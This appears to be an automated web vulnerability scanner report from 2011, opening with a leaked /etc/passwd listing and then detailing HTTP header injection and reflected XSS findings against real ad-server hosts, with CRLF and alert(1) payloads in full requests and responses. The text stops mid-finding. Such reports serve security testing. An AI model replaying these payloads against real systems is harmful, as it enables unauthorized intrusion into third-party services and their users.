root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. HTTP header injection  previous  next
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadj/imdb2.consumer.title/maindetails

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 14526%0d%0a7db69468a61 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadj/imdb2.consumer.title/maindetails;tile=3;sz=1x1,4x1;p=f1;ifb=pf;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452?&14526%0d%0a7db69468a61=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1016
DCLK_imp: v7;j;211364898;0-0;2;32554139;4/1;42349616/42367403/1;;~okv=;tile=3;sz=1x1,4x1;p=f1;ifb=pf;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;;14526
7db69468a61
=1;~cs=i:
Date: Mon, 13 Jun 2011 11:24:46 GMT

document.write('<!-- Template ID = 15350 Template Name = !IMDb - Simple Image Template - DFP Upload -->\n\n<!--\nUSEFUL DFP PLACEHOLDERS :\n DFP Click Thru : http://ad.doubleclick.net/click%3Bh%3Dv
...[SNIP]...

3.2. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadj/imdb2.consumer.title/maindetails

Issue detail

The value of the tile request parameter is copied into the DCLK_imp response header. The payload 8c2e6%0d%0a02125434862 was submitted in the tile parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadj/imdb2.consumer.title/maindetails;tile=8c2e6%0d%0a02125434862 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 240
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:24:29 GMT
Expires: Mon, 13 Jun 2011 11:24:29 GMT
DCLK_imp: v7;j;44306;0-0;0;32554139;0/0;0/0/0;;~okv=;tile=8c2e6
02125434862
;~cs=t:

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/v;44306;0-0;0;32554139;255-0/0;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt
...[SNIP]...

3.3. http://ad.doubleclick.net/pfadx/fansided_cim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/fansided_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload a5537%0d%0a4e1cfeec7e4 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/fansided_cim/;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;ord=1307962894346?&a5537%0d%0a4e1cfeec7e4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 985
DCLK_imp: v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;;a5537
4e1cfeec7e4
=1;~cs=k:
Date: Mon, 13 Jun 2011 11:02:01 GMT

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;positio
...[SNIP]...

3.4. http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/fansided_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 7615e%0d%0af9020d9662b was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/fansided_cim/;secure=7615e%0d%0af9020d9662b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:56 GMT
Expires: Mon, 13 Jun 2011 11:01:56 GMT
DCLK_imp: v7;x;44306;0-0;0;63616830;0/0;0/0/0;;~aopt=2/2/ff/0;~okv=;secure=7615e
f9020d9662b
;~cs=c:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/h;44306;0-0;0;63616830;783-50/50;0/0/0;;~aopt=2/2/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.5. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d724925/2/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 7f396%0d%0a95abbdc4443 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/2/725047/adscout.php?ord=4df5ee2b64ddd HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1; ES=7f396%0d%0a95abbdc4443

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:12:22 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Sun, 13-Jun-2010 11:12:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=7f396
95abbdc4443
_724925-zSN:M-0; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3.6. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 58567%0d%0ab0067a605a1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/58567%0d%0ab0067a605a1/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM?pv=4694778565.317392&cookie=&width=300&height=250&x=0&y=0&keyw=&cpm=g)))TfX9OwANT9wK5X7HoUIl-3PEgN44d0Iq9sK8DQ HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 13 Jun 2011 12:07:00 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/58567
b0067a605a1
/SDUW4IOBWFCKJBD7TJN7TI/7e0e346171a4d3507190678e09366eb4.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.7. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 6eb1e%0d%0a31147183afa was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=6eb1e%0d%0a31147183afa&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:6eb1e
31147183afa
;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:49 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:49 GMT
Content-Length: 2417
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',6eb1e
3114
...[SNIP]...

3.8. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e47fa%0d%0ac6a295f0dc0 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=e47fa%0d%0ac6a295f0dc0&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:e47fa
c6a295f0dc0
;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2417
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',e47fa
c6a2
...[SNIP]...

3.9. http://www22.glam.com/cTagsImgCmd.act [gname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload bc557%0d%0a14ab2681ee8 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=bc557%0d%0a14ab2681ee8&gvalue=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^929ce6feb36d1ee96e6acadee107c6f7^115232130551023312111^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^6971307962974364^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^bc557
Set-Cookie: bc557
14ab2681ee8
=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771; expires=Wed, 15 Jun 2011 11: 02:54 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=144
Date: Mon, 13 Jun 2011 11:02:54 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

4. Cross-site scripting (reflected)  previous  next
There are 285 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7f41'-alert(1)-'77ffbacf38b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtvd7f41'-alert(1)-'77ffbacf38b/ent_010111;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtvd7f41'-alert(1)-'77ffbacf38b/ent_010111;sz=728x90;net=cm;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a0df'-alert(1)-'ad6b99e809c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_0101113a0df'-alert(1)-'ad6b99e809c;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:30 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:30 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtv/ent_0101113a0df'-alert(1)-'ad6b99e809c;sz=728x90;net=cm;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.mtv/ent_010111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

